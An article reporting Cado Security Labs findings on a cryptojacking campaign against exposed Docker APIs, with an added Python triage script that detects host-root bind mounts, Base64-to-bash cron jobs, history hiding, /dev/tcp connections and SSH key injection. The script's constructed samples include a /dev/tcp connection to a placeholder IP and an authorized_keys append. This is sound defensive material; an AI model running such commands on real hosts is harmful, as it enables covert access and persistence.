Researchers at Cado Security Labs received an alert from a honeypot exposing the Docker Engine API. "A Docker command was received…" they wrote, "that spawned a new container based on Alpine Linux and created a bind mount of the root directory of the underlying honeypot server…"
This is typically exploited to write out jobs for the Cron scheduler to run. In this particular campaign, the attacker uses exactly this method to write an executable file to the path /usr/bin/vurl. It also registers a Cron job that decodes some Base64-encoded shell commands and runs them on the fly by piping them to bash.
The vurl executable consists of nothing more than a simple shell script function, used to establish a TCP connection to the attacker's command and control (C2) infrastructure via the /dev/tcp device file. The Cron job above uses the vurl executable to retrieve the first-stage payload from the C2 server… If that retrieval method fails, the attacker writes an additional Cron job that attempts to use Python's urllib2 library to retrieve another payload named death,
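The initial-access and persistence artifacts just described (a container that bind-mounts the host's root directory, a Cron entry that decodes Base64 and pipes it into bash, and a helper script that opens raw C2 connections through /dev/tcp) are simple to hunt for on a host. The following triage script is an added example, not code from Cado Security Labs or from the campaign; it also covers the history-hiding and SSH-key tells discussed further down. All inputs (the `docker inspect` excerpt, the crontab and the script body) are constructed for illustration, and the container name, IP address and key are placeholders.

```python
# Added example: triage helpers for the artifacts described in the text.
# Not the campaign's code and not Cado's; every input below is constructed.
import json
import re

# Constructed excerpt in the shape of `docker inspect` output (fields trimmed).
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web",
     "HostConfig": {"Binds": ["/srv/web:/usr/share/nginx/html:ro"], "Privileged": False}},
    {"Name": "/sharp_cat",
     "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False}},
])

# Constructed crontab: one benign backup job, one Base64-decode-and-pipe job
# (the Base64 here is just "echo hello").
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
* * * * * echo ZWNobyBoZWxsbw== | base64 -d | bash
"""

# Constructed script body with the tells discussed in the text: history hiding,
# a raw /dev/tcp connection, and an authorized_keys append (placeholder key/IP).
SAMPLE_SCRIPT = """\
#!/bin/bash
shopt -ou history
unset HISTFILE
exec 3<>/dev/tcp/203.0.113.10/80
echo "ssh-ed25519 AAAAC3Nz... attacker@example" >> /root/.ssh/authorized_keys
"""

# "base64 -d ... | bash" (or sh/zsh/dash) anywhere on a cron line.
CRON_DECODE_PIPE = re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba|z|da)?sh\b")

SCRIPT_RULES = {
    "history_hidden": re.compile(
        r"(?:\bshopt\b.*\bhistory\b|\bunset\s+HISTFILE\b|HISTFILE=/dev/null|set\s+\+o\s+history)"),
    "dev_tcp": re.compile(r"/dev/(?:tcp|udp)/"),
    "authorized_keys_append": re.compile(r">>?\s*\S*authorized_keys"),
}


def host_root_binds(inspect_json):
    """Return names of containers whose bind mounts expose the host root ('/')."""
    hits = []
    for container in json.loads(inspect_json):
        binds = container.get("HostConfig", {}).get("Binds") or []
        for bind in binds:
            # Bind syntax is host_path:container_path[:options].
            host_path = bind.split(":", 1)[0]
            if host_path == "/":
                hits.append(container["Name"])
                break
    return hits


def suspicious_cron_lines(crontab):
    """Return crontab lines that decode Base64 and pipe the result to a shell."""
    return [line for line in crontab.splitlines() if CRON_DECODE_PIPE.search(line)]


def script_indicators(script):
    """Return the set of rule names that fire anywhere in a shell script body."""
    return {name for name, rule in SCRIPT_RULES.items() if rule.search(script)}


if __name__ == "__main__":
    print("host-root binds:", host_root_binds(SAMPLE_INSPECT))
    print("cron decode-and-pipe:", suspicious_cron_lines(SAMPLE_CRONTAB))
    print("script indicators:", sorted(script_indicators(SAMPLE_SCRIPT)))
```

On a live host the same functions can be fed the output of `docker inspect $(docker ps -aq)`, the contents of `crontab -l` for each user plus the files under /etc/cron.d, and any script those jobs reference. The bind-mount check is the important one for the Docker API exposure: a container with `/` bound inside it can write cron jobs, SSH keys and binaries straight onto the host, so any such container that you did not create deserves an incident, not a ticket.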
"Multiple user-mode rootkits have been deployed to hide malicious processes," they note. And one of the shell scripts "includes the `shopt` (shell option) command to prevent additional shell commands from the attacker's session from being appended to the history file… In addition to preventing additional commands from being written to the history file, the `shopt` command itself does not appear in the shell history once a new session is spawned."
According to the article, the same script also injected "attacker-controlled SSH keys to maintain access to compromised hosts," retrieved a miner for the Monero cryptocurrency, created "persistence in the form of a systemd service," and deployed an open source Golang reverse shell utility named Platypus.
It also deployed "a myriad of utilities," according to SecurityWeek, including masscan for host discovery. Citing the Cado researchers, SecurityWeek also writes that the shell scripts "weaken machines by disabling SELinux and other features and uninstalling monitoring agents."
The Golang payloads deployed in these attacks allow the attackers to search for and remove Docker images from the Ubuntu or Alpine repositories, and to identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet. "For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host," the researchers write.
"This extensive attack demonstrates the variety of initial access techniques available to cloud and Linux malware developers," Cado points out. "It is clear that attackers are investing significant time in understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services, and using that knowledge to gain a foothold in target environments."